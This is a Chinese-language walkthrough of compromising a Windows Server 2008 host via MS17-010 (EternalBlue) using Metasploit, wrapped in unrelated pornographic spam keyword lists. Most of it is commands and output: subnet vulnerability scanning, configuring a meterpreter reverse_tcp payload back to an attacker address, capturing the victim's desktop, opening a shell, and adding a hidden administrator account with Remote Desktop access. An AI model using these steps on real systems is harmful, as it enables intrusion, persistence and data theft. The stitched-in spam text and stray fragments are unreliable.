久久久精品网站,成人伊人网,色吧av色av,亚洲AV永久无码精品秋霞电影影院

service pack

前沿拓展:

service pack

您好,Microsoft Wi

永恒之藍(lán)是2017年席卷全球的勒索軟件的罪魁禍?zhǔn)?,是微軟近些年來最為?yán)重的遠(yuǎn)程代碼執(zhí)行漏洞,可以直接獲得系統(tǒng)權(quán)限,請(qǐng)所有IT從業(yè)人員在任何時(shí)候都要打滿補(bǔ)丁以絕后患。

利用方法

進(jìn)入msf框架

root@kali:~# msfconsole

查找MS17-010相關(guān)利用代碼

search 17_010
[!] Module database cache not built yet, using slow searchMatching Modules
================ Name Disclosure Date Rank Description —- ————— —- ———–
auxiliary/admin/**b/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion **B Remote Windows Command Execution
auxiliary/scanner/**b/**b_ms17_010 normal MS17-010 **B RCE Detection
exploit/windows/**b/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue **B Remote Windows Kernel Pool Corruption
exploit/windows/**b/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion **B Remote Windows Code Execution

檢測(cè)內(nèi)網(wǎng)中存在漏洞的主機(jī)系統(tǒng)

msf > use auxiliary/scanner/**b/**b_ms17_010
msf auxiliary(scanner/**b/**b_ms17_010) > show options
Module options (auxiliary/scanner/**b/**b_ms17_010):
Name Current Setting Required Description
—- ————— ——– ———–
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The **B service port (TCP)
**BDomain . no The Windows domain to use for authentication
**BPass no The password for the specified username
**BUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/**b/**b_ms17_010) > set RHOSTS 192.168.136.129/24
RHOSTS => 192.168.136.129/24
msf auxiliary(scanner/**b/**b_ms17_010) > exploit
[*] Scanned 26 of 256 hosts (10% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] 192.168.136.129:445 – Host is likely VULNERABLE to MS17-010! – Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)

加載攻擊模塊

msf auxiliary(scanner/**b/**b_ms17_010) > use exploit/windows/**b/ms17_010_eternalblue
msf exploit(windows/**b/ms17_010_eternalblue) > show options
Module options (exploit/windows/**b/ms17_010_eternalblue):
Name Current Setting Required Description
—- ————— ——– ———–
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
**BDomain . no (Optional) The Windows domain to use for authentication
**BPass no (Optional) The password for the specified username
**BUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
— —- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

配置

msf exploit(windows/**b/ms17_010_eternalblue) > set RHOST 192.168.136.129RHOST => 192.168.136.129msf exploit(windows/**b/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/**b/ms17_010_eternalblue) > set LHOST 192.168.136.131LHOST => 192.168.136.131msf exploit(windows/**b/ms17_010_eternalblue) > show options
Module options (exploit/windows/**b/ms17_010_eternalblue):
Name Current Setting Required Description
—- ————— ——– ———–
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.136.129 yes The target address
RPORT 445 yes The target port (TCP)
**BDomain . no (Optional) The Windows domain to use for authentication
**BPass no (Optional) The password for the specified username
**BUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 192.168.136.131 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

發(fā)動(dòng)攻擊

msf exploit(windows/**b/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.136.131:4444 [*] 192.168.136.129:445 – Connecting to target for exploitation.
[+] 192.168.136.129:445 – Connection established for exploitation.
[+] 192.168.136.129:445 – Target OS selected valid for OS indicated by **B reply
[*] 192.168.136.129:445 – CORE raw buffer dump (53 bytes)
[*] 192.168.136.129:445 – 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2[*] 192.168.136.129:445 – 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 192.168.136.129:445 – 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 192.168.136.129:445 – 0x00000030 61 63 6b 20 31 ack 1 [+] 192.168.136.129:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.136.129:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.136.129:445 – Sending all but last fragment of exploit packet
[*] 192.168.136.129:445 – Starting non-paged pool grooming
[+] 192.168.136.129:445 – Sending **Bv2 buffers
[+] 192.168.136.129:445 – Closing **Bv1 connection creating free hole adjacent to **Bv2 buffer.
[*] 192.168.136.129:445 – Sending final **Bv2 buffers.
[*] 192.168.136.129:445 – Sending last fragment of exploit packet!
[*] 192.168.136.129:445 – Receiving response from exploit packet
[+] 192.168.136.129:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.136.129:445 – Sending egg to corrupted connection.
[*] 192.168.136.129:445 – Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.136.129[*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800[+] 192.168.136.129:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.136.129:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

獲取對(duì)方電腦桌面

meterpreter > screenshot
Screenshot saved to: /root/VrBAGsTE.jpeg

service pack

獲得shell權(quán)限

meterpreter > shellProcess 4088 created.Channel 1 created.Microsoft Windows [?汾 6.1.7601]??????? (c) 2009 Microsoft Corporation???????????????C:Windowssystem32>

添加管理員并加入遠(yuǎn)程桌面組

net user test test123 /add
net user localgroup administrators test /add
net localgroup “Remote Desktop Users” test /add

完成入侵。

MS17-010在msf里屬于中等使用難度,涉及了掃描、配置回鏈方式、桌面抓圖、提權(quán)等手段,是非常好的學(xué)習(xí)對(duì)象。

拓展知識(shí):

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請(qǐng)注明出處:http://xiesong.cn/31254.html

99久久久久久久久| 天天插插天天射射| 综合亚洲欧洲| 潮喷网址| 制服丝袜一区二区三区| 九九只有精品| 国产91一二三| 久久中文字幕伊人| 国产精品视频青青草| 中文字幕不卡熟女| 乱人伦人妻中文字幕无码久久网| 亚洲乱伦天堂| 网禁稀缺女呦在线| 亚洲成人激品| 免费VA毛片| 秋霞久久av网| 精品国产欧美一区二区三区成人| 香蕉久久影院| 熟女69x x| 美女做暖网站| 老色综合| 亚洲永久www| 欧美中文字幕| 中文字幕 人妻 日韩 在线| 77777黄色视频| 成人网大香蕉| 男人成人网站在线观看| 超碰人人射人人插| 在线免费黄色| 国产午夜成人久久无码一区二区 | 内射精品| 另类激情图区| com看黄色片| 99欧美国产| 四虎影院www4H| 在线播放你懂的| 国产成人乱色伦区| 99久久精品毛片免费| 大草莓自慰| av在线 六月天| 欧美色精品一区二区|